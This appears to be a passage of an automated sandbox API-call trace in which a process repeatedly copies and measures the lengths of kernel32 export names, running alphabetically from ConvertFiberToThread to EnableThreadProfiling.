[0086.988] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.988] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.989] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.989] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.989] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.989] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.989] lstrlenA (lpString="COPYFILEA") returned 9 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.989] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.989] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.989] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.989] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.989] lstrlenA (lpString="COPYFILEW") returned 9 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.989] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.989] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.989] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.989] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.989] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.989] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.989] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.989] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.990] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.990] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.990] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.990] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.990] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.990] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.990] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.990] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.990] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.990] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.990] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.990] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.990] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.990] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.990] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.990] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.990] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.990] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.990] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.991] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.991] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.991] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.991] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.991] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.991] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.991] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.991] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.991] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.991] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.991] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.991] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.991] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.991] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.991] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.991] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.991] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.991] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.991] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.992] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.992] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.992] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.992] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.992] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.992] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.992] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.992] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.992] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.992] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.992] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.992] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.992] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.992] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.992] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.992] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.992] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.992] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.992] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.993] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.993] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.993] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.993] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.993] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.993] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.993] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.993] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.993] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.993] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.993] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.993] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.993] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.993] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.993] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.993] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.993] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.993] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.994] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.994] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.994] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.994] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.994] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.994] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.994] lstrlenA (lpString="DELETEATOM") returned 10 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.994] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.994] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.994] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.994] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.994] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.994] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.994] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.994] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.994] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.994] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.994] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.994] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.994] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.995] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.995] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.995] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.995] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.995] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.995] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.995] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.995] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.995] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.995] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.995] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.995] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.995] lstrlenA 